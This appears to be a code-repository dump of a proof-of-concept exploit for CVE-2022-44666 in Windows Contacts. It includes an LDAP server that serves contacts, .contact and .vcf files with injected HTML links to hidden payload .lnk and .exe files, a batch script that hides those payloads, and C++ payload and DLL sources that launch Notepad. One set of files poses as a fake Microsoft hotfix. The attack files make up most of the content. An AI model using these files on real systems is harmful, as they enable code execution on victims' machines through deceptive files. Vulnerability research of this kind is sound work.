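        self.f.close()
        self.db = result


class LDAPServerFactory(ServerFactory):
    """Twisted factory that builds one LDAPServer protocol per connection.

    ``root`` is the DIT root entry (``Tree.db``). The ``__main__`` block
    registers an adapter so that ``IConnectedLDAPEntry(factory)`` resolves
    to ``factory.root``, which is how ldaptor's LDAPServer locates the tree.
    """
    protocol = LDAPServer

    def __init__(self, root):
        self.root = root
        # buildProtocol reads this attribute; the original left it unset and
        # relied on the caller assigning ``factory.debug`` before the first
        # connection arrived (an AttributeError otherwise). Default it off;
        # callers may still override it after construction.
        self.debug = False

    def buildProtocol(self, addr):
        """Instantiate the per-connection protocol, propagating the debug
        flag and the back-reference to this factory."""
        proto = self.protocol()
        proto.debug = self.debug
        proto.factory = self
        return proto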
81 | 82 | 83 | if __name__ == "__main__": 84 | from twisted.internet import reactor 85 | 86 | if len(sys.argv) == 2: 87 | port = int(sys.argv[1]) 88 | else: 89 | port = 389 90 | # First of all, to show logging info in stdout : 91 | log.startLogging(sys.stderr) 92 | # We initialize our tree 93 | tree = Tree() 94 | # When the LDAP Server protocol wants to manipulate the DIT, it invokes 95 | # `root = interfaces.IConnectedLDAPEntry(self.factory)` to get the root 96 | # of the DIT. The factory that creates the protocol must therefore 97 | # be adapted to the IConnectedLDAPEntry interface. 98 | registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry) 99 | factory = LDAPServerFactory(tree.db) 100 | factory.debug = True 101 | application = service.Application("ldaptor-server") 102 | myService = service.IServiceCollection(application) 103 | serverEndpointStr = "tcp:{0}".format(port) 104 | e = serverFromString(reactor, serverEndpointStr) 105 | d = e.listen(factory) 106 | reactor.run() -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/KB5001337-hotfix/install-hotfix.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="..\hidden\payload.lnk">Run-installer </a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | Microsoft KB5001337-hotfix 23 | Microsoft 24 | Microsoft 25 | 26 | 27 | 28 | 29 | "></a><a href="..\hidden\payload.exe">Run-installer </a> 30 | 31 | Business 32 | 33 | 34 | 35 | "></a><a href="notepad">Run-installer </a> 36 | 37 | Personal 38 | 39 | 40 | 41 | 42 | 43 | Microsoft Hotfix 44 | Microsoft Corporation 45 | 46 | Business 47 | 48 | 49 | 50 | 51 | 52 | 53 | UserTile 54 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- 
/further-pocs/to-copy-in-remote-shared-location/KB5001337-hotfix/install-hotfix.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:Microsoft 4 | FN:Microsoft 5 | NICKNAME: Microsoft KB5001337-hotfix 6 | ORG:Microsoft Corporation 7 | TITLE:Microsoft Hotfix 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">Run-installer 12 | URL;WORK:">Run-installer 13 | URL;TYPE=HOME:">Run-installer 14 | END:VCARD -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/hidden/payload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/to-copy-in-remote-shared-location/hidden/payload.bin -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/hidden/payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/to-copy-in-remote-shared-location/hidden/payload.exe -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/hidden/payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/to-copy-in-remote-shared-location/hidden/payload.lnk -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/setup-hidden.bat: -------------------------------------------------------------------------------- 1 | attrib +s +h +r 
hidden\payload.bin 2 | attrib +s +h +r hidden\payload.exe 3 | attrib +s +h +r hidden\payload.lnk 4 | attrib +s +h +r hidden -------------------------------------------------------------------------------- /images/convert-vcf-to-contact-wabmig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/convert-vcf-to-contact-wabmig.png -------------------------------------------------------------------------------- /images/credits-update-cve-2022-44666.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/credits-update-cve-2022-44666.png -------------------------------------------------------------------------------- /images/href-attribute-fake-target.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-fake-target.png -------------------------------------------------------------------------------- /images/href-attribute-relative-exec-payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-relative-exec-payload.png -------------------------------------------------------------------------------- /images/href-attribute-relative-lnk-payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-relative-lnk-payload.png -------------------------------------------------------------------------------- /images/href-attribute-relative-path.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-relative-path.png -------------------------------------------------------------------------------- /images/href-attribute-remote-loc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-remote-loc.png -------------------------------------------------------------------------------- /images/msrc-reply-se-attack-not-meet-sec-update.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/msrc-reply-se-attack-not-meet-sec-update.png -------------------------------------------------------------------------------- /images/msrc-reply-vcf-opened-non-default-program.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/msrc-reply-vcf-opened-non-default-program.png -------------------------------------------------------------------------------- /report-pocs/exploit.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="hidden\payload.lnk">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | j00sean 23 | j00sean 24 | j00sean 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 
43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a href="hidden\payload.exe">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Security researcher 66 | 0day Factory 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /report-pocs/exploit.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:j00sean 4 | FN:j00sean 5 | NICKNAME:j00sean 6 | ORG:0day Factory 7 | TITLE:Security researcher 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE 12 | 
URL;WORK:">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE 13 | URL;TYPE=HOME:">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE 14 | END:VCARD -------------------------------------------------------------------------------- /report-pocs/exploit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/report-pocs/exploit.zip -------------------------------------------------------------------------------- /report-pocs/hidden/payload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/report-pocs/hidden/payload.bin -------------------------------------------------------------------------------- /report-pocs/hidden/payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/report-pocs/hidden/payload.exe -------------------------------------------------------------------------------- /report-pocs/hidden/payload.lnk: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/report-pocs/hidden/payload.lnk -------------------------------------------------------------------------------- /src/dllmain.cpp: --------------------------------------------------------------------------------
// dllmain.cpp : Defines the entry point for the DLL application.
#pragma warning(disable: 28159)  // presumably silences the analyzer's deprecated-API warning for WinExec — TODO confirm
#include "pch.h"

// Exported no-op. Presumably present only so the module carries an export table;
// nothing in this file calls it.
extern "C" __declspec(dllexport) void Foo() {}

// Proof-of-execution for the PoC: launches Notepad (show command 1 = SW_SHOWNORMAL).
// This is the entire observable effect of the DLL.
void inject() {
    WinExec("notepad", 1);
}

// DLL entry point. The proof-of-execution runs only on DLL_PROCESS_ATTACH, i.e. when
// the module is mapped into a process; thread attach/detach and process detach do nothing.
// NOTE(review): creating a process from DllMain runs under the loader lock, which
// Microsoft documents as unsafe; it is tolerable for a one-shot demo, not for reuse.
// Always reports successful initialisation.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        inject();
    }
    return TRUE;
}

-------------------------------------------------------------------------------- /src/payload.cpp: -------------------------------------------------------------------------------- // payload.cpp : This file contains the 'main' function. Program execution begins and ends there.
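//
#pragma warning(disable: 28159)  // presumably silences the analyzer's deprecated-API warning for WinExec — TODO confirm
#include <windows.h>
// NOTE(review): the original source had a second #include here; its header name was lost in this rendering.

// Proof-of-execution payload for the PoC. Its only action is to launch Notepad
// (show command 1 = SW_SHOWNORMAL) and exit; the instance, command-line and
// show-command arguments are unused.
// Returns the process exit code (always 0).
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
    WinExec("notepad", 1);
    return 0;  // explicit exit code: falling off the end of a non-void function is undefined behaviour
}
-------------------------------------------------------------------------------- /videos/browsers-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/browsers-exploit.gif -------------------------------------------------------------------------------- /videos/browsers-poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/browsers-poc.gif -------------------------------------------------------------------------------- /videos/full-payload.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/full-payload.gif -------------------------------------------------------------------------------- /videos/ldap-browsers-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/ldap-browsers-exploit.gif -------------------------------------------------------------------------------- /videos/ldap-msword-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/ldap-msword-exploit.gif -------------------------------------------------------------------------------- /videos/ldap-pdfreaders-exploit.gif: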
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/ldap-pdfreaders-exploit.gif -------------------------------------------------------------------------------- /videos/micropatch-0patch.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/micropatch-0patch.gif -------------------------------------------------------------------------------- /videos/msword-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/msword-exploit.gif -------------------------------------------------------------------------------- /videos/msword-poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/msword-poc.gif -------------------------------------------------------------------------------- /videos/pdfreaders-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/pdfreaders-exploit.gif -------------------------------------------------------------------------------- /videos/pdfreaders-poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/pdfreaders-poc.gif -------------------------------------------------------------------------------- /videos/simple-payload.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/simple-payload.gif --------------------------------------------------------------------------------